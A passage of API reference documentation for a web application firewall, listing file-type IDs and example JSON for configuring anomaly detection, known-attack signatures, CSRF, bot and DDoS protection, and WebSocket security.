| 00044 | Apple Lossless Audio(.m4a) |
| 00052 | Digital Speech Standard(.dss) |
| 00011 | Real Media File(.rm) |
| 00012 | MPEG v4 |
| 00013 | 3GPP |
| 00015 | AVI |
| 00020 | Macromedia Flash |
| 00035 | Windows Animated Cursor |
| 00045 | DVD Video Movie File(.vob) |
| 00008 | RAR |
| 00009 | ZIP |
| 00017 | TAR |
| 00025 | 7-ZIP |
| 00027 | Debian Package |
| 00029 | Microsoft Cabinet File |
| 00033 | Unix Archiver File(.ar) |
| 00034 | Installshield Cabinet Archive Data |
| 00040 | AIN Archive Data(.ain) |
| 00041 | BZIP2 Archive(.bz2) |
| 00057 | WinZIP ZIPX Archive(ZIPx) |
| 00058 | Gzipped Tape Archive(TGZ) |
| 00094 | TXT(.txt) |
| 00095 | ZIP(.zip) |
| 00096 | 7-ZIP(.7z) |
| 00097 | Debian Package(.pkg) |
| 00098 | Unix Archiver File(.ar) |
| 00099 | AIN Archive Data(.ain) |
| 00100 | BZIP2 Archive(.bz2) |
| 00101 | Gzipped Tape Archive(.tgz) |
| 00102 | Word(.docx) |
| 00103 | Word Macro-Enabled(.docm) |
| 00104 | Word Template(.dotx) |
| 00105 | Word Macro-Enabled Template(.dotm) |
| 00106 | Excel(.xlsx) |
| 00107 | Excel Macro-Enabled(.xlsm) |
| 00108 | Excel Template(.xltx) |
| 00109 | Excel Macro-Enabled Template(.xltm) |
| 00110 | Excel Add-In(.xlam) |
| 00111 | PPT(.pptx) |
| 00112 | PPT Macro-Enabled(.pptm) |
| 00113 | PPT Template(.potx) |
| 00114 | PPT Macro-Enabled Template(.potm) |
| 00115 | PPT Add-In(.ppam) |
| 00116 | PPT Show(.ppsx) |
| 00117 | PPT Macro-Enabled Show(.ppsm) |
| 00118 | Visio Drawing(.vsdx) |
| 00119 | Visio Macro-Enabled Drawing(.vsdm) |
| 00120 | Visio Stencil(.vssx) |
| 00121 | Visio Macro-Enabled Stencil(.vssm) |
| 00122 | Visio Template(.vstx) |
| 00123 | Visio Macro-Enabled Template(.vstm) |
| 00124 | PDF(.pdf) |
| 00125 | XML(.xml) |
| 00126 | EXE(.exe) |
| 00127 | Rich Text Format(.rtf) |
| 00128 | Windows Help File(.hlp) |
| 00129 | Windows Mobile Note(.pwi) |
| 00130 | Windows Registry Text(.reg) |
| 00131 | SQL Server 2000 Database(.mdf) |
| 00132 | Java Archive(.jar) |
| 00133 | Windows Printer Spool File(.shd) |
| 00134 | Windows Shortcut File(.lnk) |
| 00135 | Quark Express Document(.qxd) |
| 00136 | Windows MS Info File(.mof) |
| 00137 | Microsoft Access Database(.MDB) |
| 00138 | SPSS Data(.SAV) |
| 00139 | RedHat Package Manager file(.RPM) |
| 00140 | VMware Virtual Disk File(.vmdk) |
| 00141 | Adobe encapsulated PostScript file(.EPS) |
| 00142 | SPSS Data(.SAV) |
| 00145 | Lotus 1-2-3 spreadsheet(.WK) |
| 00146 | SkinCrafter skin file(.skf) |
| 00147 | Nero CD Compilation(.NRI) |
| 00148 | Microsoft Office Word(.doc) |
| 00149 | Microsoft Office Excel(.xls) |
| 00150 | Microsoft Office PowerPoint(.ppt) |
| 00151 | Hancom Office Hanword(.hwp) |
| 00152 | PHP(.php) |
| 00153 | JSP(.jsp) |
| 00154 | ASPX(.aspx) |
| 00155 | GIF(.gif) |
| 00156 | JPG(.jpg) |
| 00157 | BMP(.bmp) |
| 00158 | SPSS Data(.SAV) |
| 00159 | Windows Metafile Format(.wmf) |
| 00160 | Windows Icon(.icon) |
| 00161 | Microsoft Document Image(.mdi) |
| 00162 | Windows Enhanced Metafile(.emf) |
| 00163 | Photoshop Image File(.psd) |
| 00164 | JPEG-2000 Image File Format(.jp2) |
| 00165 | Multipage PCX Bitmap File(.dcx)(.SAV) |
| 00166 | SQL(.sql) |
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (FileProtection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "trojan": true,
- "sandbox": true,
- "av_scan": true,
- "file_action": "Allow",
- "file_size": 1024,
- "url": "/1",
- "file_types": [
- {
- "idx": 1,
- "type": "GIF",
- "tid": "00001"
}, - {
- "idx": 2,
- "type": "XPS",
- "tid": "00059"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of anomaly detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "ip_list_type": "Trust",
- "ip_list": [
- {
- "idx": 1,
- "ip": "181.12.3.1-181.12.3.10"
}
]
}
}
}Update the configuration of anomaly detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (AnomalyDetection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "ip_list_type": "Trust",
- "ip_list": [
- {
- "idx": 1,
- "ip": "181.12.3.1-181.12.3.10"
}
]
}
}{- "detail": "Module updated"
}Get the Overview data of of anomaly detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "categories": [ ],
- "event_json": [
- {
- "action_source": "FortiWeb daemon",
- "arg_name": "demo1",
- "from_state": 1,
- "is_back": 0,
- "model": "",
- "reason": "Parameter confirmed",
- "time_stamp": "1679173986",
- "to_state": 1,
- "url_path": "/"
}
], - "event_series": [
- {
- "name": "Anomaly",
- "data": [ ]
}
], - "hmm_data": [
- {
- "name": "Collecting",
- "y": 2
}, - {
- "name": "Building",
- "y": 0
}, - {
- "name": "Running",
- "y": 1
}, - {
- "name": "Discarded",
- "y": 1
}
], - "summary_data": {
- "alert_requests": 0,
- "block_requests": 0,
- "charset": "UTF-8",
- "charset_status": 2,
- "http_requests": 0,
- "https_requests": 0,
- "total_requests": 0,
- "train_start_time": "1679006536",
- "url_num": 2
}, - "top10_data": [
- {
- "name": "/",
- "y": 0
}
], - "traffic_series": [
- {
- "data": [ ],
- "name": "HTTP Requests"
}, - {
- "data": [ ],
- "name": "HTTPS Requests"
}
]
}Get the Treeview data of anomaly detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "treeData": [
- {
- "id": 1,
- "url_id": 1,
- "events": 0,
- "hasChild": true,
- "isLink": true,
- "isRoot": true,
- "label": "/",
- "path": "/",
- "nodes": [
- {
- "id": 2,
- "url_id": 2,
- "events": 0,
- "isLink": true,
- "isRoot": false,
- "label": "api/",
- "path": "/api/"
}
]
}
]
}Get the URL Stats data of anomaly detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_id required | string URL ID of model, required when get URL Stats detail. |
{- "summary": {
- "access_heat": 0,
- "alert": 0,
- "anomaly": 0,
- "block": 0,
- "train_start_time": "1679006595",
- "traffic_trend": [
- {
- "alert": 0,
- "anomaly_count": 0,
- "block": 0,
- "id": 1,
- "request_count": 0,
- "stat_time": "1680206590"
}
]
}, - "details": {
- "parameters": [
- {
- "url_id": 1,
- "arg_learn_stage": "running",
- "arg_learn_stat": 4,
- "arg_name": "demo1",
- "arg_ratio": 0,
- "arg_sample_cnt": 2000,
- "cur_time": 0,
- "events": 0,
- "id": 3,
- "max_arg_ratio": 0,
- "max_time": 0,
- "sample_collecting_mode": 0
}
]
}
}Rebuild URL of Anomaly Detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_id required | integer URL ID in model |
{- "url_id": 1
}{- "detail": "Module updated"
}Rebuild http argument of Anomaly Detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_id required | integer URL ID in model |
| arg_id required | integer HTTP argument ID in model |
{- "url_id": 1,
- "arg_id": 1
}{- "detail": "Module updated"
}Rebuild all URLs under the directory of Anomaly Detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| path required | string URL path in model |
{- "path": "/api/"
}{- "detail": "Module updated"
}Discard http argument of Anomaly Detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_id required | integer URL ID in model |
| arg_id required | integer HTTP argument ID in model |
{- "url_id": 1,
- "arg_id": 1
}{- "detail": "Module updated"
}Get the configuration of known attacks.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "sensitivity_level": 1,
- "sql_inject": true,
- "cross_site_script": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true,
- "sig_except_rules": [
- {
- "idx": 1,
- "sig_name": "SQL Injection",
- "sig_id": "030000010",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
], - "stack_sql_inject": true,
- "embed_sql_inject": true,
- "condition_sql_inject": true,
- "arithmetic_sql_inject": true,
- "line_comments": true,
- "sql_func_inject": true,
- "html_tag_xss_inject": true,
- "html_attr_xss_inject": true,
- "html_css_xss_inject": true,
- "js_func_xss_inject": true,
- "js_var_xss_inject": true,
- "stx_except_rules": [
- {
- "idx": 1,
- "attack_cat": "SQL Injection (Syntax Based Detection)",
- "attack_name": "Embedded Queries SQL Injection",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
]
}
}
}Update the configuration of known attacks.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (KnownAttacks) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "sensitivity_level": 1,
- "sql_inject": true,
- "cross_site_script": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true,
- "sig_except_rules": [
- {
- "idx": 1,
- "sig_name": "SQL Injection",
- "sig_id": "030000010",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
], - "stack_sql_inject": true,
- "embed_sql_inject": true,
- "condition_sql_inject": true,
- "arithmetic_sql_inject": true,
- "line_comments": true,
- "sql_func_inject": true,
- "html_tag_xss_inject": true,
- "html_attr_xss_inject": true,
- "html_css_xss_inject": true,
- "js_func_xss_inject": true,
- "js_var_xss_inject": true,
- "stx_except_rules": [
- {
- "idx": 1,
- "attack_cat": "SQL Injection (Syntax Based Detection)",
- "attack_name": "Embedded Queries SQL Injection",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
]
}
}{- "detail": "Module updated"
}Get the configuration of CSRF protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": false,
- "action": "alert",
- "page_list": [
- {
- "idx": 1,
- "url": "/1",
- "filter": true,
- "name": "a",
- "value": "1"
}
], - "url_list": [
- {
- "idx": 1,
- "url": "/2",
- "filter": true,
- "name": "b",
- "value": "2"
}
]
}
}
}Update the configuration of CSRF protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (CSRFProtection) |
{- "template": false,
- "configs": {
- "status": false,
- "action": "alert",
- "page_list": [
- {
- "idx": 1,
- "url": "/1",
- "filter": true,
- "name": "a",
- "value": "1"
}
], - "url_list": [
- {
- "idx": 1,
- "url": "/2",
- "filter": true,
- "name": "b",
- "value": "2"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of HTTP header security.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "x_frame_options": true,
- "x_content_type_options": true,
- "x_xss_protection": true,
- "content_security_policy": true,
- "header_value": "X"
}
}
}Update the configuration of HTTP header security.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (HttpHeaderSecurity) |
{- "template": false,
- "configs": {
- "status": true,
- "x_frame_options": true,
- "x_content_type_options": true,
- "x_xss_protection": true,
- "content_security_policy": true,
- "header_value": "X"
}
}{- "detail": "Module updated"
}Get the configuration of MITB protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "request_url": "/1",
- "post_url": "/2",
- "param_list": [
- {
- "idx": 1,
- "type": "regular-input",
- "name": "a",
- "obfuscate": true,
- "encrypt": false,
- "anti_key_logger": false
}
], - "domain_list": [
]
}
}
}Update the configuration of MITB protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (MITBProtection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "request_url": "/1",
- "post_url": "/2",
- "param_list": [
- {
- "idx": 1,
- "type": "regular-input",
- "name": "a",
- "obfuscate": true,
- "encrypt": false,
- "anti_key_logger": false
}
], - "domain_list": [
]
}
}{- "detail": "Module updated"
}Get the configuration of request limits.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "allow_methods": [
- "get",
- "post",
- "head"
], - "http_header_action": "alert_deny",
- "header_len": 8192,
- "header_name_len": 50,
- "header_value_len": 4096,
- "cookie_num": 128,
- "range_num": 5,
- "redundant_header_check": true,
- "illegal_header_name_check": false,
- "illegal_header_value_check": false,
- "http_param_action": "alert_deny",
- "url_param_len": 8192,
- "url_param_num": 128,
- "url_param_name_len": 4096,
- "url_param_value_len": 4096,
- "duplicate_param_check": true,
- "illegal_param_name_check": false,
- "illegal_param_value_check": false,
- "http_req_action": "alert_deny",
- "req_filename_len": 2048,
- "header_line_num": 128,
- "illegal_char_check": true,
- "null_char_check": true,
- "malformed_url_check": true,
- "http2_max_requests_check": true,
- "http2_max_requests_num": 1000,
- "http2_rst_action": "block_period",
- "http2_rst_stream_check": true,
- "http2_rst_stream_num": 50,
- "http2_rst_stream_frq_check": true,
- "http2_rst_stream_frq_num": 20
}
}
}Update the configuration of request limits.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (RequestLimits) |
{- "template": false,
- "configs": {
- "status": true,
- "allow_methods": [
- "get",
- "post",
- "head"
], - "http_header_action": "alert_deny",
- "header_len": 8192,
- "header_name_len": 50,
- "header_value_len": 4096,
- "cookie_num": 128,
- "range_num": 5,
- "redundant_header_check": true,
- "illegal_header_name_check": false,
- "illegal_header_value_check": false,
- "http_param_action": "alert_deny",
- "url_param_len": 8192,
- "url_param_num": 128,
- "url_param_name_len": 4096,
- "url_param_value_len": 4096,
- "duplicate_param_check": true,
- "illegal_param_name_check": false,
- "illegal_param_value_check": false,
- "http_req_action": "alert_deny",
- "req_filename_len": 2048,
- "header_line_num": 128,
- "illegal_char_check": true,
- "null_char_check": true,
- "malformed_url_check": true,
- "http2_max_requests_check": true,
- "http2_max_requests_num": 1000,
- "http2_rst_action": "block_period",
- "http2_rst_stream_check": true,
- "http2_rst_stream_num": 50,
- "http2_rst_stream_frq_check": true,
- "http2_rst_stream_frq_num": 20
}
}{- "detail": "Module updated"
}Get the configuration of IP protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "ip_reputation": true,
- "block_country_list": [
- "Afghanistan",
- "Bahamas"
], - "ip_list": [
- {
- "idx": 1,
- "type": "trust-ip",
- "ip": "1.1.1.1"
}, - {
- "idx": 2,
- "type": "block-ip",
- "ip": "2.2.2.2"
}, - {
- "idx": 3,
- "type": "allow-only-ip",
- "ip": "3.3.3.3"
}
]
}
}
}Update the configuration of IP protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (IPProtectionPut) |
{- "template": false,
- "configs": {
- "status": true,
- "ip_reputation": true,
- "block_country_list": [
- "Afghanistan",
- "Bahamas"
], - "ip_list": [
- {
- "type": "trust-ip",
- "ip": "1.1.1.1"
}, - {
- "type": "block-ip",
- "ip": "2.2.2.2"
}, - {
- "type": "allow-only-ip",
- "ip": "3.3.3.3"
}
]
}
}{- "detail": "Module updated"
}Export IP Protection list.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "file_name": "ip_protection_list.csv",
- "content": "encoding data"
}
}Get the configuration of URL access.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "action": "pass",
- "name": "a",
- "url": "/1"
}
]
}
}
}Update the configuration of URL access.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (UrlAccess) |
{- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "action": "pass",
- "name": "a",
- "url": "/1"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of CORS protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "url_pattern": "/",
- "block_cors_traffic": false,
- "allowed_credentials": "None",
- "allowed_maximum_age": 0,
- "allowed_origins": [
- {
- "protocol": "ANY",
- "origin_name": "test",
- "port": 1,
- "include_sub_domains": false
}
], - "allowed_methods": {
- "status": true,
- "methods": [
- "GET"
]
}, - "allowed_headers": {
- "status": true,
- "headers": [
- "demo"
]
}, - "exposed_headers": {
- "status": true,
- "headers": [
- "demo_ex"
]
}
}
}
}Update the configuration of CORS protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (CorsProtection) |
{- "template": false,
- "configs": {
- "status": true,
- "url_pattern": "/",
- "block_cors_traffic": false,
- "allowed_credentials": "None",
- "allowed_maximum_age": 0,
- "allowed_origins": [
- {
- "protocol": "ANY",
- "origin_name": "test",
- "port": 1,
- "include_sub_domains": false
}
], - "allowed_methods": {
- "status": true,
- "methods": [
- "GET"
]
}, - "allowed_headers": {
- "status": true,
- "headers": [
- "demo"
]
}, - "exposed_headers": {
- "status": true,
- "headers": [
- "demo_ex"
]
}
}
}{- "detail": "Module updated"
}Get the configuration of known bots.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "bad_bots": true,
- "bad_bots_action": "block_period",
- "bad_bots_list": [
- {
- "cat": "DoS",
- "allow_list": [
- "AB"
], - "status": true
}, - {
- "cat": "Spam",
- "allow_list": [
- "Adsarobot"
], - "status": true
}, - {
- "cat": "Trojan",
- "allow_list": [
- "AskPartnerCobranding"
], - "status": true
}, - {
- "cat": "Scanner",
- "allow_list": [
- "Absinthe"
], - "status": true
}, - {
- "cat": "Crawler",
- "allow_list": [
- "AhrefsBot"
], - "status": true
}
], - "good_bots_action": "bypass",
- "good_bots_list": [
- {
- "cat": "Known Search Engines",
- "deny_list": [
- "Ask"
], - "status": true
}
]
}
}
}Update the configuration of known bots.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (KnownBots) |
{- "template": false,
- "configs": {
- "status": true,
- "bad_bots": true,
- "bad_bots_action": "block_period",
- "bad_bots_list": [
- {
- "cat": "DoS",
- "allow_list": [
- "AB"
], - "status": true
}, - {
- "cat": "Spam",
- "allow_list": [
- "Adsarobot"
], - "status": true
}, - {
- "cat": "Trojan",
- "allow_list": [
- "AskPartnerCobranding"
], - "status": true
}, - {
- "cat": "Scanner",
- "allow_list": [
- "Absinthe"
], - "status": true
}, - {
- "cat": "Crawler",
- "allow_list": [
- "AhrefsBot"
], - "status": true
}
], - "good_bots_action": "bypass",
- "good_bots_list": [
- {
- "cat": "Known Search Engines",
- "deny_list": [
- "Ask"
], - "status": true
}
]
}
}{- "detail": "Module updated"
}Get the configuration of machine learning bot detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "identification_method": "IP-and-User-Agent",
- "model_type": "Strict",
- "anomaly_count": 1,
- "challenge": "Real-Browser-Enforcement",
- "block_duration": 600,
- "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
], - "url_list": [
- {
- "idx": 1,
- "url": "/1"
}
]
}
}
}Update the configuration of machine learning bot detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (MLBotDetection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "identification_method": "IP-and-User-Agent",
- "model_type": "Strict",
- "anomaly_count": 1,
- "challenge": "Real-Browser-Enforcement",
- "block_duration": 600,
- "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
], - "url_list": [
- {
- "idx": 1,
- "url": "/1"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of bot detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "crawler": true,
- "vulnerability_scan": true,
- "slow_attack": true,
- "content_scraping": true,
- "credential_brute_force": true,
- "request_url": "^/login.(php|asp|aspx|jsp)",
- "occurrence": 10,
- "range": 60,
- "challenge": "RBE"
}
}
}Update the configuration of bot detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (BotDetection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "crawler": true,
- "vulnerability_scan": true,
- "slow_attack": true,
- "content_scraping": true,
- "credential_brute_force": true,
- "request_url": "^/login.(php|asp|aspx|jsp)",
- "occurrence": 10,
- "range": 60,
- "challenge": "RBE"
}
}{- "detail": "Module updated"
}Get the configuration of bot deception.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "deception_url": "/url.html",
- "url_list": [
- {
- "idx": 1,
- "url": "/1"
}
]
}
}
}Update the configuration of bot deception.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (BotDeception) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "deception_url": "/url.html",
- "url_list": [
- {
- "idx": 1,
- "url": "/1"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of biometrics based detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "mouse_movement": true,
- "click": true,
- "keyboard": true,
- "screen_touch": true,
- "scroll": true,
- "event_collect_time": 15,
- "bot_effect_time": 5,
- "url_list": [
- {
- "idx": "1",
- "url": "/1"
}
]
}
}
}Update the configuration of biometrics based detection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (BiometricsBasedDetection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "mouse_movement": true,
- "click": true,
- "keyboard": true,
- "screen_touch": true,
- "scroll": true,
- "event_collect_time": 15,
- "bot_effect_time": 5,
- "url_list": [
- {
- "idx": "1",
- "url": "/1"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of DDoS prevention.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "http_access_limit": true,
- "http_request_limit": 1000,
- "conn_flood_check": true,
- "conn_flood_limit": 100,
- "http_flood_prevent": true,
- "http_session_limit": 500,
- "challenge": "real-browser-enforcement",
- "tcp_flood_prevent": false,
- "tcp_conn_num_limit": 255,
- "block_period": 600
}
}
}Update the configuration of DDoS prevention.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (DDoSPrevention) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "block_period",
- "http_access_limit": true,
- "http_request_limit": 1000,
- "conn_flood_check": true,
- "conn_flood_limit": 100,
- "http_flood_prevent": true,
- "http_session_limit": 500,
- "challenge": "real-browser-enforcement",
- "tcp_flood_prevent": false,
- "tcp_conn_num_limit": 255,
- "block_period": 600
}
}{- "detail": "Module updated"
}Get the configuration of WebSocket security.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "rule_list": [
- {
- "idx": 1,
- "name": "WS-Rule",
- "url": "/",
- "allow_websocket": true,
- "allow_plain_text": true,
- "allow_binary_text": true,
- "block_extensions": true,
- "max_frm_size": 64,
- "max_msg_size": 1024,
- "block_extentions": true,
- "block_attacks": true,
- "origin_list": [
- {
- "idx": 1,
- "origin": "org1"
}
]
}
]
}
}
}Update the configuration of WebSocket security.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (WebSocketSecurity) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "rule_list": [
- {
- "idx": 1,
- "name": "WS-Rule",
- "url": "/",
- "allow_websocket": true,
- "allow_plain_text": true,
- "allow_binary_text": true,
- "block_extensions": true,
- "max_frm_size": 64,
- "max_msg_size": 1024,
- "block_extentions": true,
- "block_attacks": true,
- "origin_list": [
- {
- "idx": 1,
- "origin": "org1"
}
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of WebSocket security of the template.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| template_id required | string Example: {{template_id}} The template ID. |
{- "result": {
- "configs": {
- "status": true,
- "action": "alert_deny",
- "rule_list": [
- {
- "idx": 1,
- "name": "WS-Rule",
- "url": "/",
- "allow_websocket": true,
- "allow_plain_text": true,
- "allow_binary_text": true,
- "block_extensions": true,
- "max_frm_size": 64,
- "max_msg_size": 1024,
- "block_extentions": true,
- "block_attacks": true,
- "origin_list": [
- {
- "idx": 1,
- "origin": "org1"
}
]
}
]
}
}
}Update the configuration of WebSocket security of the template.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| template_id required | string Example: {{template_id}} The template ID. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (WebSocketSecurity) |
{- "configs": {
- "status": true,
- "action": "alert_deny",
- "rule_list": [
- {
- "idx": 1,
- "name": "WS-Rule",
- "url": "/",
- "allow_websocket": true,
- "allow_plain_text": true,
- "allow_binary_text": true,
